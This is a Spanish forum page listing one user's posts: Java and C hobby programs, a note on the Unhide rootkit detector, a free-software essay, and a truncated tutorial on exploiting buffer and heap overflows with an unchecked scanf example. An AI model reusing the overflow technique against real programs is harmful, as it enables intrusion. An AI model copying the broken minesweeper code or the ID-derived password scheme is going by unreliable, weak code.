Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - darkbouser

#1
Java / Conversor de números decimales a binario
Diciembre 27, 2014, 01:23:10 PM
 Saludos y felices fiestas.

   Quiero compartir un código que hice ayer por la noche porque estaba aburrido y me gusta estudiar números binarios. Hice un convertidor de números decimales a números binarios en java. Me gustó mucho la manera con que lo hice porque da exactamente el número de bits que le corresponde a cada número a través de una lista simple. Esta aplicación se puede hacer de muchas formas, solo he hecho esta y se que la manera más sencilla es con esta estructura dinámica. El resto fue con propiedades matemáticas y un método sencillo para transformar decimales a binario.

A continuación, les comparto el código fuente de cada clase.

CLASE NODO

Código: java

public class Nodo {
   
    private int _data;
    private Nodo _prox;
   
    public Nodo(int _data)
    {
        this._data = _data;
        this._prox = null;
    }

    public int getData() {
        return _data;
    }

    public void setData(int _data) {
        this._data = _data;
    }

    public Nodo getProx() {
        return _prox;
    }

    public void setProx(Nodo _prox) {
        this._prox = _prox;
    }
   
    public void Mostrar()
    {
        System.out.print(_data);
    }
}


CLASE LISTA SIMPLE
Código: java

public class ListaSimple {
   
    private Nodo _cabeza;
   
    public ListaSimple()
    {
        this._cabeza = null;
    }

    public Nodo getCabeza() {
        return _cabeza;
    }

    public void setCabeza(Nodo _cabeza) {
        this._cabeza = _cabeza;
    }
   
    public void InsertarPrimero(Nodo n)
    {
        if(_cabeza == null)
        {
           _cabeza = n;
        }
        else
        {
           n.setProx(_cabeza);
           _cabeza = n;
        }
    }
   
    public void InsertaFinal(Nodo n)
    {
        if(_cabeza == null)
        {
            _cabeza = n;
           
        }
        else
        {
            Nodo aux = _cabeza;
           
            while(aux.getProx() != null)
            {
                aux = aux.getProx();
            }
           
            aux.setProx(n);
        }
    }
   
    public Nodo EliminaPrimero()
    {
        if(_cabeza == null)
        {
            return null;
        }
        else if(_cabeza.getProx() == null)
        {
           Nodo aux = _cabeza;
           _cabeza = null;
           return aux;
        }
        else
        {
            Nodo aux = _cabeza;
            _cabeza = aux.getProx();
            aux.setProx(null);
            return aux;
           
        }
    }
   

   
    public void EliminarTodo()
    {
       int cont = 0;
       Nodo aux = _cabeza;
       
       while(aux != null)
       {
           cont++;
           aux = aux.getProx();
       }
       
        for (int i = 0; i < cont; i++) {
            this.EliminaPrimero();
        }
    }
   
    public void Mostrar()
    {
        Nodo aux = _cabeza;
       
        while(aux != null)
        {
            aux.Mostrar();
            aux = aux.getProx();
        }
    }
   
}


CLASE APLICACIÓN BINARIO

Código: java

public class Binario {

    /**
     * @param args the command line arguments
     */
   
   
    public int ContarBits(int n ,Binario bin)
    {
     int x = 0;
            for (int i = 1; i <= n; i++) {
               if(bin.EsPotenciade2(i))
               {
                   x++;
               }
        }
           
            return x;
    }
   
   
    public void TransformarBinario(int n, Binario bin, ListaSimple ls)
    {
        int cont = bin.ContarBits(n, bin);
       
         for (int i = 1; i <= cont; i++) {
             
             if(n % 2 == 0)
             {
                 ls.InsertarPrimero(new Nodo(0));
             }
             else
             {
                 ls.InsertarPrimero(new Nodo(1));
             }
             
             n = n / 2;
        }
     
    }
   
    public boolean EsPotenciade2(int n)
    {
        return ((Math.log(n) / Math.log(2)) % 1 == 0);
    }
   
   
   
   
   
    public static void main(String[] args) {
       
        Scanner sc = new Scanner(System.in);
        ListaSimple ls = new ListaSimple();
        Binario bin = new Binario();
        int x = 0;
        int num = 0;
        int rsp = 1;
        while(rsp == 1)
        {   
            System.out.println("Ingrese un numero");
            num = sc.nextInt();
            bin.ContarBits(num, bin);
            bin.TransformarBinario(num, bin, ls);
            ls.Mostrar();
         
            System.out.println("\n Desea convertir otro numero decimal a binario ? si(1), no(0) \n");
            //SE INICIALIZA OTRA VEZ PARA SER UTILIZADO NUEVAMENTE
            num = 0;
            ls.EliminarTodo();
            rsp = sc.nextInt();
        }
    }
   
}



Eso fue todo. Espero que les haya gustado. Saludos otra vez y feliz año nuevo.
#2
Códigos Fuentes / Buscaminas en C por darkbouser
Octubre 19, 2014, 12:37:02 AM
Saludos, hace mucho tiempo que no paso por aquí, de vez en cuando entro a los foros y leo para aprender y para actualizarme. Como regalo de mi visita, compartiré con ustedes un sofisticado buscaminas que hice en C hace un tiempo, pero como ya no programo en C decidí compartirselo a ustedes. Nunca lo terminé del todo, me dio flojera :/ lo que no he terminado es el cronometro y algunas mejoras como inicializar todas las casillas cuando el juego termina.

    Para los que no sepan mucho de programación o esten aprendiendo en C, solo diré que el juego esta hecho con dos matrices, una en la que le muestre al usuario y otra interna llamada vectormuerte, es allí donde ocurren los cambios. El código esta bien estructurado y es bastante básico.

    El usuario puede elegir 3 niveles cada nivel tendrá minas diferentes  y además de eso el usuario puede bloquear o desbloquear casillas, saber cuando hay una mina cerca, es decir la típica jugabilidad es la misma.  Se juega por consola. Diviértanse.

Código: c


#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <math.h>
#include <conio.h>
#include <windows.h>


//PROTOTIPO DE FUNCIONES




//FUNCIÓN PARA DARLE LA BIENVENIDA AL USUARIO Y MOSTRARLE LAS REGLAS DEL JUEGO
void Bienvenida()
{
char rsp;
printf("\n Bienvenidos al buscaMinas Bou-Cecere V2.0\n");


printf("\n Sabe usted como jugar BuscaMinas ? Si(Presione cualquier tecla), No(n)\n");
        scanf(" %c", &rsp);
       
if (rsp == 'n'|| rsp == 'N')
{
            system("cls");
            printf("\n Buscaminas es un juego basado en un tablero, en este caso de 8 filas\n");   
            printf("\n y 8 columnas. El juego, dependiendo del nivel que usted seleccione, \n"); 
            printf("\n arrojara un numero de minas al tablero. Jugada tras jugada, debera \n");
            printf("\n ingresar una coordenada con dos posibilidades: abrir la casilla escogida\n");
        printf("\n o colocar una bandera 'B', indicando que cree que ahi se encuentra una mina.\n");
        printf("\n Al seleccionar una casilla si se encuentra una mina aparecera una 'X', de\n");
        printf("\n de lo contrario aparecera un numero, que indicara el numero de minas que\n");
        printf("\n se encuentran en el perimetro; asi: si aparece el numero 1, significa que\n");
        printf("\n hay una mina en el perimetro de esa casilla.\n");
printf("\n El objetivo del buscaminas es lograr descubrir las casillas minadas, \n");
printf("\n pero sin activarlas, es decir, localizarlas por descarte, prestando \n");
printf("\n atencion a los cuadros numericos que ayudan a revelar la ubicacion de las \n");
printf("\n minas\n");
printf("\n \n");
printf("\n EL jugador podra marcar las minas para bloquearlas y acumular puntos\n");
printf("\n Si el jugador marca una casilla sin minas, entonces se le sumara un punto\n");
printf("\n La partida habra terminado cuando el jugador active una mina\n");
printf("\n Gana el jugador que obtenga mas puntos siempre y cuando el puntaje sea positivo\n");
system("pause");
}
          else if  (rsp == 'S'|| rsp == 's')
          {
          printf("\n Listo para jugar, solo \n");
          system("pause");
          }
}

//FUNCIÓN PARA ELEGIR EL NIVEL DE DIFICULTAD
void Eleccion(char *nivel){
     
     
     system("cls");
     printf("\n Ingrese el nivel de dificultad en el cual desea jugar:\n");
     printf("\n Facil<1>, Intermedio <2>, Dificil <3>\n");
     printf("\n Facil:      para jugar con 3 minas en tablero.\n");
     printf("\n Intermedio: para jugar con 6 minas en tablero.\n");
     printf("\n Dificil:    para jugar con 10 minas en tablero.\n");
     
     do{                          // INICIO VALIDACION                                           
     scanf(" %c", &*nivel);
     system("cls");       
             if(*nivel!='1' && *nivel!='2' && *nivel!='3'){
                         
                         printf("\n El nivel ingresado es incorrecto por favor ingrese un dato valido\n\n");
                         }
                         }while( *nivel!='1' && *nivel!='2' && *nivel!='3' );     // FINAL VALIDACION
}

void Inicializar(char vectormina[][8], char vectormuerte[][8])
{
for(int i=0; i<8; i++)// For para la matriz base
{
for(int j=0; j<8; j++)
{
vectormina[i][j]='$';
vectormuerte[i][j]=0;
}
}
}

void Random(char vectormuerte[][8], char *nivel, int i, int j){
     
//CONDICIONES PARA LA VARIABLE NIVEL
if (*nivel == '1')
{
printf("\n Ha seleccionado el Nivel Facil\n");
system("pause");


srand(time(NULL)); //SEMILLA DEL RANDOM 1

for(int k =1; k <=3; k++)
{

if(vectormuerte[i][j] != 'X'){
                                 
i = (rand() % 8);

j = (rand() % 8);
        }

else if(vectormuerte[i][j] == 'X')
            {
                   
                   
                    i = (rand() % 7)+1;

        j = (rand() % 7)+1;   
                   
                    }
                       
vectormuerte[i][j] = 'X';




}
}

else if (*nivel == '2')
{
printf("\n Ha seleccionado el nivel Intermedio\n");
system("pause");

srand(time(NULL)); //SEMILLA DEL RANDOM 2

for(int k =1; k <=6; k++)
{
if(vectormuerte[i][j] != 'X'){
                                 
i = (rand() % 8);

j = (rand() % 8);
        }

else if(vectormuerte[i][j] == 'X')
            {
                   
                   
                    i = (rand() % 7)+1;

        j = (rand() % 7)+1;   
                   
                    }

vectormuerte[i][j] = 'X';



    }
    }
   
else if (*nivel == '3')
{
printf("\n Ha seleccionado el nivel Dificil\n");
system("pause");

   

srand(time(NULL)); //SEMILLA DEL RANDOM 3

for(int k =1; k <=10; k++)
{
if(vectormuerte[i][j] != 'X'){
                                 
i = (rand() % 8);

j = (rand() % 8);
        }

else if(vectormuerte[i][j] == 'X')
            {
                   
                   
                    i = (rand() % 7)+1;

        j = (rand() % 7)+1;   
                   
                    }
                   
                   
                           
                                 
vectormuerte[i][j] = 'X';

       
       
       


    }

     }
}   // FIN DEL VOID RANDOM

void Mostrar(char vectormina[][8])
{
   //system("cls");
    printf("\n\n");
    printf("                   ");
    for(int i = 1; i <= 8; i++){
           
        printf("( %i )", i);
    }
        printf("\n");
       
    for(int i = 1; i <= 8; i++){
        printf("\n              ( %i )", i);
        for(int j = 1; j <= 8; j++){
                                             
            printf("[ %c ]", vectormina[i-1][j-1]);
            }
        printf("\n");
    }
}

void Pregunta(char *condicion)
{
     printf("\n Si desea desbloquear una casilla marque la letra 'c'\n");
     printf("\n Si desea marcar una casilla marque la letra 'b'\n");
     
     do
     {
               
     scanf(" %c", &*condicion);
     
     if( *condicion!='c' && *condicion!='C' && *condicion!='b' && *condicion!='B')
     {
      printf("\n    Opcion equivocada, seleccione una opcion valida ('c') o ('b')\n ");
      }       
     
     }while( *condicion!='c' && *condicion!='C' && *condicion!='b' && *condicion!='B');
         
     }
     

void Bandera(char vectormuerte[][8], char vectormina[][8], int *clicki, int *clickj,  int *acum)
 
{
      do
      {
          printf("\n Ingrese la coordenana que desea marcar (en forma de fila y columna)\n");
         
          scanf("%i", &*clicki);
          scanf("%i", &*clickj);
         
         if(vectormina[*clicki-1][*clickj-1]!='$'){
                                                 
          system("cls");                                         
         
          printf("\n                La coordenada seleccionada ya fue utilizada\n");
         
          Mostrar(vectormina);
         }
         
     }while (vectormina[*clicki-1][*clickj-1]!='$'); 
         
       vectormina[*clicki-1][*clickj-1] = 0;
       vectormina[*clicki-1][*clickj-1] = 'B';
       
       //CONDICION PARA SUMAR O RESTAR PUNTOS
       if (vectormuerte[*clicki-1][*clickj-1] == 'X')
           {
                  *acum = *acum + 5;                           
            }
            else if (vectormuerte[*clicki-1][*clickj-1] != 'X')
            {
               *acum = *acum -2;     
            }
           
}


           
void Coordenada(char vectormina[][8], char vectormuerte[][8], int *clicki, int *clickj, int posicion, int *acum)
{
     do
     {
     
printf("\n Ingrese la coordenada que desea desbloquear (en forma de fila y columna)\n");

scanf("%i", &*clicki);
    scanf("%i", &*clickj);    
   
    if(vectormina[*clicki-1][*clickj-1]!='$' && vectormina[*clicki-1][*clickj-1]!='B'){
                                                 
          system("cls");                                       
         
          printf("\n                La coordenada seleccionada ya fue utilizada\n\n");
         
          Mostrar(vectormina);
         
         }
         
     }while (vectormina[*clicki-1][*clickj-1]!='$' && vectormina[*clicki-1][*clickj-1]!='B');
                                             
         
         if (vectormina[*clicki-1][*clickj-1]!='$')
         {
                  *acum++;
                 
                  }                                 
                                                 
   
if (vectormuerte[*clicki-1][*clickj-1] != 'X')
{
  *acum++;
   
if ((*clicki-1)!=0 && (*clicki-1)!=7 && (*clickj-1)!=0 && (*clickj-1)!=7) //Calculo Matriz central
{

    for (int i=0; i<3; i++)
    {
        for (int j=0; j<3; j++)
        {
                       
             if (vectormuerte[*clicki-2+i][*clickj-2+j]=='X')
             {
                posicion++;
               
                }
        }
     }   

}

     else if( (*clicki-1)==0 && (*clickj-1)!=0 && (*clickj-1)!=7) //Validacion Fila 0
          {
    for (int i=0; i<3; i++)
    {
        for (int j=0; j<3; j++)
        {
             do
             {
                           
             if (vectormuerte[*clicki-2+i][*clickj-2+j]=='X')
             {
                posicion++;
               
                }
             }while( (*clicki-1>0) );   
        }
     } 
}       



       else if( (*clicki-1)==7 && (*clickj-1)!=0 && (*clickj-1)!=7) //Validacion Fila 7
          {
    for (int i=0; i<3; i++)
    {
        for (int j=0; j<3; j++)
        {
             do
             {
                           
             if (vectormuerte[*clicki-2+i][*clickj-2+j]=='X')
             {
                posicion++;
               
                }
             }while( (*clicki-1<8) );   
        }
     } 
}         

    else if( (*clickj-1)==0 && (*clicki-1)!=0 && (*clicki-1)!=7) //Validacion columna 0
          {
    for (int i=0; i<3; i++)
    {
        for (int j=0; j<3; j++)
        {
             do
             {
                           
             if (vectormuerte[*clicki-2+i][*clickj-2+j]=='X')
             {
                posicion++;
               
                }
             }while( (*clickj-1<0) );   
        }
     } 
}     

    else if( ( (*clickj-1)==7 && (*clicki-1)!=0 && (*clicki-1)!=7)) //Validacion columna 7
          {
    for (int i=0; i<3; i++)
    {
        for (int j=0; j<3; j++)
        {
             do
             {
                           
             if (vectormuerte[*clicki-2+i][*clickj-2+j]=='X')
             {
                posicion++;
               
                }
             }while( (*clickj-1<8) );   
        }
     } 
}         

  else if( ( (*clickj-1)==0 && (*clicki-1)==0) ) //Validacion Esquina 1
          {
    for (int i=0; i<3; i++)
    {
        for (int j=0; j<3; j++)
        {
             do
             {
                           
             if (vectormuerte[*clicki-2+i][*clickj-2+j]=='X')
             {
                posicion++;
               
                }
             }while( (*clickj-1<0) && (*clicki-1<0) );   
        }
     } 


  else if( ( (*clickj-1)==0 && (*clicki-1)==7) ) //Validacion Esquina 2
          {
    for (int i=0; i<3; i++)
    {
        for (int j=0; j<3; j++)
        {
             do
             {
                           
             if (vectormuerte[*clicki-2+i][*clickj-2+j]=='X')
             {
                posicion++;
               
                }
             }while( (*clicki-1<0) && (*clickj-1<8) );   
        }
     } 


  else if( ( (*clickj-1)==7 && (*clicki-1)==0) ) //Validacion Esquina 3
          {
    for (int i=0; i<3; i++)
    {
        for (int j=0; j<3; j++)
        {
             do
             {
                           
             if (vectormuerte[*clicki-2+i][*clickj-2+j]=='X')
             {
                posicion++;
               
                }
             }while( (*clicki-1<8) && (*clickj-1<0) );   
        }
     } 
}         
   
   else if( ( (*clickj-1)==7 && (*clicki-1)==7) ) //Validacion Esquina 4
          {
    for (int i=0; i<3; i++)
    {
        for (int j=0; j<3; j++)
        {
             do
             {
                           
             if (vectormuerte[*clicki-2+i][*clickj-2+j]=='X')
             {
                posicion++;
               
                }
             }while( (*clicki-1<7) && (*clickj-1<7) );   
        }
     } 
}   

 
                                                               
            switch(posicion)
            {
           case 1:
                 vectormuerte[*clicki-1][*clickj-1] = '1';                   
                 break; 
                           
           case 2:
                 vectormuerte[*clicki-1][*clickj-1] = '2';                   
                 break;
                     
           case 3:
                 vectormuerte[*clicki-1][*clickj-1] = '3';                   
                 break;   
                 
           case 4:
                 vectormuerte[*clicki-1][*clickj-1] = '4';                   
                 break; 
             
           case 5:
                 vectormuerte[*clicki-1][*clickj-1] = '5';                   
                 break;   
                 
           case 6:
                 vectormuerte[*clicki-1][*clickj-1] = '6';                   
                 break;   
                 
           case 7:
                 vectormuerte[*clicki-1][*clickj-1] = '7';                   
                 break;                               
                 
           case 8:
                 vectormuerte[*clicki-1][*clickj-1] = '8';                   
                 break;     
          }
   
 
 
//Con esta instrucción, se desbloquea la casilla seleccionada y se copia el contenido de vectormuerte
   
}
      vectormina[*clicki-1][*clickj-1] = 0;
  vectormina[*clicki-1][*clickj-1] = vectormuerte[*clicki-1][*clickj-1];
}

void cronometro(int s, int m, int h)
{
while(1)
{
if (s >=60)
{
s = 0;
m++;
if (m >= 60)
{
m = 0;
h++;
}
}

Sleep(1000); // funcion para que corra el ciclo en milisegundos
s++;


}
getch();
}



main()                                                                       //PROGRAMA PRINCIPAL
{
char vectormina[8][8],nivel, vectormuerte[8][8], fin, condicion;
int  minas=0, clicki=0, clickj=0, posicion=0, acum = 0;
int i=0,j=0;
int s=0, m=0, h=0; //contadores para el cronometro

system("color f");

//LLAMADO DE LAS FUNCIONES DECLARADAS
Bienvenida();
Eleccion(&nivel);
Inicializar(vectormina, vectormuerte);
    Random(vectormuerte, &nivel, i, j);
   

    Mostrar(vectormina);
   
   
   
    do
    {
            Pregunta(&condicion);
           
            if (condicion=='b'|| condicion=='B')
            {
                       
                 Bandera( vectormuerte, vectormina, &clicki, &clickj, &acum);
           
            }
           
            else if( condicion=='c' || condicion== 'C')
            {
                 
         Coordenada(vectormina, vectormuerte, &clicki, &clickj, posicion, &acum);
            }
           
           
           
    Mostrar(vectormina);
   
    if (vectormuerte[clicki-1][clickj-1] == 'X' && condicion=='c' || vectormuerte[clicki-1][clickj-1] == 'X' && condicion=='C')
{
               
//LA PARTIDA HABRA TERMINADO
fin = 'X';

for (int i=0; i<8; i++){
           
            for(int j=0; j<8; j++){
                   
                    if (vectormuerte[i][j]=='X')
                    {
                                                             
                    vectormina[i][j]=0;
                            vectormina[i][j]= vectormuerte[i][j];
                           
                            } 
                           
            }
        }     
              system("cls"); 
             
        Mostrar(vectormina);
                         
                                                                   
printf("\n\n     :::::::::Usted ha perdido !x_x!   LA PARTIDA HA FINALIZADO:::::::::\n");
system("pause");
system("cls");
printf("\n El puntaje obtenido en la partida es %i\n", acum);
printf("\n El tiempo jugado fue:\n");
printf("%i %i %i",h,m,s);
printf("\n\n       ");
system("pause");
}
   
    } while (fin != 'X');
   
   

} //FIN DE LA CONDICION DE LA VARIABLE NIVEL

#3
Presentaciones y cumpleaños / Darkbouser returns
Noviembre 28, 2013, 04:24:13 PM
Hola a todos  :)  me hago llamar darkbouser. Estuve ausente por mucho tiempo (años) y estoy devuelta. Antrax has hecho un buen trabajo la comunidad ha crecido muchísimo y me sorprende que Devilboy siga por aquí  y con el mismo avatar de siempre.

saludos amigos
#4
Acabo de hacer un generador de contraseñas de 4 dígitos tomadas como base de una cédula de identidad (documento de identificación en Venezuela) pero puede ser cualquier número de 8 dígitos. Esta elaborado de acuerdo a unas especificaciones que tiene comentado antes de las librerías de C.

Código: c
 
/* Dada una cedula de identidad, genere una clave de cuatro digintos, formada de acuerdo a las siguientes reglas:
1) El digito de las unidades en la clave sera el digito menos significativo del resultado de sumar los digitos mas y menos
significativos de la cedula de identidad.
  2) El digito de las decenas en la clave sera el resto de dividir entre 9 a la suma de todos los digitos de la cedula
3) El digito de las centenas de la clave sera el resto de dividir entre 7 a la suma de los digitos pares exisitentes en la cedula
4) El digito de las unidades de mil en la clave será el digito mas significativo del resultado obtenido al multiplicar
todos los digitos, diferentes de cero, de la cedula de identidad */
#include <stdio.h>
#include <stdlib.h>


void cedula(int ci[10])
{
for(int i=1; i <= 8; i++)
{
printf("\n Ingrese el %i numero de la ci\n", i);
scanf("%i", &ci[i]);
}
}

void Mostrar(int ci[10])
{

   printf("\n La cedula de indentidad ingresada es:\n");
   for(int i =1; i <= 8; i++)
   {
    printf("%i", ci[i]);
   }
   printf("\n");
   system("pause");
}

void unidades(int ci[10], int *uni)
{
*uni = ci[1] + ci[8];
}

void decena(int ci[10], int *dec)
{
   int aux=0;
   for(int i=1; i <= 8; i++)
   {
    aux = aux + ci[i];
   }
   
   *dec = aux % 9;
}

void centenas(int ci[10], int *cen)
{
int aux =0;

for(int i= 1; i <= 8; i++)
{
if (ci[i] % 2 == 0)
{
aux = aux + ci[i];
}
}

*cen = aux % 7;
}

void UnidadMil(int ci[10], int *um)
{

int aux = 1;
int aux2 = 0;

for(int i=1; i <= 8; i++)
{
if ( ci[i] != 0)
{
aux = aux * ci[i];
}
}



while(aux > 0)
{
   aux2 = aux % 10;
aux = aux /10; 
}

//le devuelve a la variable um el valor de la cifra mas significativa

*um = aux2;


}

main()
{
int ci[10]={0}, uni=0, dec=0, cen=0, um=0;

cedula(ci);
Mostrar(ci);
unidades(ci, &uni);
decena(ci, &dec);
centenas(ci, &cen);
UnidadMil(ci, &um);

//se imprime el resultado

printf("\n La contraseña generada es:\n");
printf("%i%i%i%i",um, cen, dec, uni);
system("pause");

//FIN DEL PROGRAMA
}


Saludos.
#5
Normal 0 21 false false false MicrosoftInternetExplorer4 /* Style Definitions */ table.MsoNormalTable {mso-style-name:"Tabla normal"; mso-tstyle-rowband-size:0; mso-tstyle-colband-size:0; mso-style-noshow:yes; mso-style-parent:""; mso-padding-alt:0cm 5.4pt 0cm 5.4pt; mso-para-margin:0cm; mso-para-margin-bottom:.0001pt; mso-pagination:widow-orphan; font-size:10.0pt; font-family:"Times New Roman"; mso-ansi-language:#0400; mso-fareast-language:#0400; mso-bidi-language:#0400;}

Recientemente  me a tocado limpiar mi computadora después de casi año y medio de tener squeezy ("en testing") ahora pasando a estable, e realizado una instalación desde cero; y buscando algunas herramientas que  permitan mejorar la seguridad en cuanto a LKMS u otras técnicas de ocultación de Rootkits, algunas de ellas ya conocidas como
Rootkithunter, Lynis o tal como Samhain, etc. Que permiten conocer  a fondo que está
corriendo por ahí.

Unhide es una herramienta forense que permite descubrir procesos  y puertos TCP/UDP
abiertos.

Unhide is a forensic tool to find hidden processes and TCP/UDP ports by rootkits / LKMs or by another hidden technique.

- Detecting hidden processes. Implements six techniques:

- Compare /proc vs /bin/ps output

- Compare info gathered from /bin/ps with info gathered by walking thru the procfs.

- Compare info gathered from /bin/ps with info gathered from syscalls (syscall scanning).

- Full PIDs space occupation (PIDs bruteforcing)

- Reverse search, verify that all thread seen by ps are also seen by the kernel (/bin/ps output vs /proc, procfs walking andsyscall)

- Quick compare /proc, procfs walking and syscall vs /bin/ps output.

- Identify TCP/UDP ports that are listening but not listed in /bin/netstat doing brute forcing of all TCP/UDP ports availables.

El proceso para instalarlo es simple solo basta con compilarlo y ejecutarlo como root.



Lo extraemos:

tar -xf unhide-20110113.tar

Compilamos:

gcc –static unhide.c -o unhide

gcc –static unhide-tcp.c -o unhide-tcp

gcc -Wall -O2 –static -pthread unhide-linux26.c -o unhide-linux26

y listo a correr:

./sanity.sh

Con esto el programa escaneará y estará en búsqueda de procesos ocultos.



Para descargar:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Más información :
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



Fuente: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#6
GNU/Linux / Filosofía del software libre
Enero 31, 2011, 07:46:57 PM
GNU son las siglas de GNU's Not Unix! (o, en español, GNU No es Unix!). Es un proyecto fundado en 1984 y, cuyo principal objetivo, era desarrollar un sistema operativo completo basado en el sistema UNIX con la peculiar característica de que tal sistema fuere software libre.

Ahora bien, ¿qué es eso del "Software Libre"? Este término es utilizado para designar a aquellas aplicaciones que son programadas para que los usuarios tengan total libertad de utilizar la aplicación de forma gratuita, tener acceso al código fuente de tal aplicación pudiendo incluso hacer sus propias modificaciones y cambios en ellas, y también tener el derecho de poder redistribuir las copias de tal aplicación.

En pocas palabras, las aplicaciones de software libre son aquellas en las que cualquier usuario no tiene porque pedir o pagar derechos y/o permisos a su autor.

La siguientes líneas fueron extraídas de la propia página web del Proyecto GNU

(//No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/)

"Software Libre" se refiere a la libertad de los usuarios de correr, copiar, distribuir, estudiar, cambiar y mejorar el software. Más precisamente, se refiere a las cuatro libertades de los usuarios de software:

~1) //La libertad// de correr el programa, con cualquier propósito (libertad 0).
~1) //La libertad// de estudiar como funcionael programa, y adaptarlo a sus necesidades (libertad 1). El acceso al código fuente es una precondición para esto.
~1) //La libertad// de distribuir copias de manera que se puede ayudar al vecino (libertad 2).
~1) //La libertad// de mejorar el programa, y liberar las mejoras al publico de tal manera que toda la comunidad se beneficia. (libertad 3). El acceso al código fuente es una precondición para esto.

Si usted desea estar mejor informado acerca de la historia, filosofía e infinidad de información sobre el proyecto GNU, le recomiendo que visite sus página en //http:// No tienes permitido ver los links. Registrarse o Entrar a mi cuenta// donde encontrará todo acerca de esta filosofía de vida.

Monografía creado por Enrique Barbeito García
#7
Hacking / Como explotar heap overflow
Julio 29, 2010, 09:19:43 PM
Empezamos...


Algo simple: overflows pa lerdos.
----------------------------------

Bueno, estamos delante de un ordenador que esta ejecutando un programa
y nos preguntamos "por que funciona este cacharro?". La verdad es que
explicar como hace lo que hace el procesador es un poco complejo (a mi me
llevo entenderlo 4 meses de una asignatura un pelin peñazo ;) pero podemos
hacer un resumen un poco tosco del mismo: tenemos un procesador que, como su
propio nombre indica, solo procesa los datos que estan en la memoria (o en
el disco duro, etc). "Y como sabe el procesador la forma en que tiene que
procesar un determinado dato?"; pues simplemente, los programas le dicen
mediante unos codigos binarios preprogramados cual es la siguiente instruccion
a ejecutar y con que datos debe hacerlo. "Y como sabe el procesador que lo que
esta procesando es un dato y no otra instruccion del programa que deberia
ejecutar?"; pues eso el procesador no lo sabe, y precisamente este hecho es lo
que vamos a aprovechar nosotros para nuestros maleficos fines.


Veamos, la memoria de un ordenador, como todos sabeis, es simplemente un
monton de registros en los que se puede almacenar 0 o 1's. No consiste en nada
mas que en eso. Por ejemplo, si tomamos una porcion muy pequeña de la memoria
y vemos lo que contiene, seguramente se parecera a esto:

Código: php
---------------------------------------------------------------------
...00101001001010101111010101010001011010100011101010101010101001....
---------------------------------------------------------------------


y a lo mejor lo que quiere significar toda esta serie de digitos es esto:
Código: php

---------------------------------------------------------------------
...00101001001010101111010101010001011010100011101010101010101001....
---------------------------------------------------------------------

instruccion | dato | dato | instruccion | instr...


Ya desde la epoca de los primeros ordenadores existia la idea de poner
una etiqueta (un bit mas) en cada conjunto de datos para diferenciar si el
conjunto en cuestion era una instruccion o un dato; pero en aquella epoca
poner un bit mas era bastante caro y los resultados de los programas se
harian mucho mas lentamente al procesar un bit mas. Ademas, Von Neumman
(un chavalote al que le debemos gran parte de los conceptos de los ordenadores
actuales) habia demostrado años atras que con una buena organizacion del
procesador y un acceso bien ordenado a la memoria, no hacia falta diferenciar
entre instrucciones y datos puesto que el procesador responderia a una
instruccion determinada y cogeria los datos que le indicaba la instruccion,
y como la instruccion siempre va a apuntar a una zona de memoria en la que
estan sus datos, pues no habia ningun problema.


Seguro que la instruccion siempre va a apuntar a una zona de memoria
donde van a estar sus datos? Bueno.... eso habria que discutirlo....
Vamos a ver el ejemplo mas tonto de stack overflow que existe. Tenemos una
variable (es decir, uno de los 'datos' de la instruccion) y ejecutamos algo
tan simple como el programilla este:

Código: php
......
main()
{
char dato[20];
....
scanf("%s",&dato);
....
}
....

y la memoria quedaria mas o menos asi (las x's representan instrucciones):

....xxxx|0000000000...0000000000|xxxxx......xxx|xxxxxxx......xxxxxxx|.....

^ ^
la variable datos[20] la instruccion scanf

pues nada, ya tenemos el juego listo. Lo normal es que el usuario,
cuando se le diga que meta el texto en cuestion para rellenar la variable
datos[20], meta menos de 20 caracteres y entonces no hay problema; pero el
problema aparece cuando le da por meter algunos mas. Resulta que el lenguaje
C no hace comprobacion de limites al ejecutar instrucciones como esas, entonces
lo que hace es simplmente seguir aceptando caracteres y guardandolos en
posiciones de memoria adyacentes a las de la variable dato[20], mas o menos
asi:

caso 1: el usuario es buena gente

Código: php
-----------------------------------------------------
.....|soy pepe000000000000|xxxxxxxxxxxxx...xxxx|.....
-----------------------------------------------------


caso 2: el usuario es un jaquerrr con ganas de hacer algo ilegal

Código: php
-----------------------------------------------------
.....|soy un megahax0r jaj|ajajajaxxxxxxxx...xx|.....
-----------------------------------------------------


Aqui vemos como se han sobreescrito los primeros bits de la instruccion
siguiente a datos[20]. Lo normal que ocurra en estos casos es que el
procesador, al intentar ejecutar esa instruccion que por supuesto no coincide
con ninguna valida, de un error y termine la ejecucion del programa.


Sin embargo, el truco consiste en sobreescribir la instruccion que sigue
a datos[20] para que sea algo que el procesador entienda. Lo mas usual es que
se sobreescriba con un salto hacia otra posicion de memoria donde hayamos
puesto antes una llamada a una shell para que, en vez de ejecutar la
instruccion, se ejecute una shell que nos daria acceso al sistema.
Graficamente:

Código: php
........................................................
................datos[20]saltoxxxxxxxx..................
........................................................
........................................................
........................................................
....shell

y terminariamos la ejecucion del programa con una flamante shell recien
invocada :).


Bueno, no me extiendo mas sobre el tema de en que consiste los overflows;
supongo que todos habeis captado la idea. Todo lo que he dicho hasta ahora
se refiere a los stacks overflows, de los que hay un montonazo de articulos
escritos tanto en castellano como en yanki-lengua, asi que si os interesa, solo
teneis que moveros por el mundo... (y tampoco mucho, este ezine trae de todo ;)


Heaps Overflows.
------------------

En los parrafos anteriores hemos visto la base de un stack overflow. No
es que sea muy complejo pero tiene ciertas curiosidades que hay que tener en
cuenta, como por ejemplo averiguar direcciones de retorno en las llamadas
a funciones y cosas asi (para saber mas, lo mejor es que os leais los
distintos artis publicados sobre el tema). Yo defiendo los heaps overflows
por su sencillez y su "pureza de lineas", como diria algun anuncio malo de
coches ;)

Por supuesto, para entender lo que es un Heap Overflow, lo primero que
hay que saber que es lo que es el Heap ;). Veamos, un programa tiene dos
formas de pedir al SO memoria para hacer su trabajo. Una de ellas es la
tipica, que hemos usado antes:

char datos[20]

con lo que el sistema asignaria una zona de memoria identificandola con el
nombre "datos" y de tamaño 20 bytes. Esta es la forma tradicional y
"estatica", es decir, que si en algun momento del programa necesitamos que en
la variable datos quepan 40 bytes, no podemos hacerlo.


La otra forma, y es la que nos interesa, es que el programa pida en tiempo
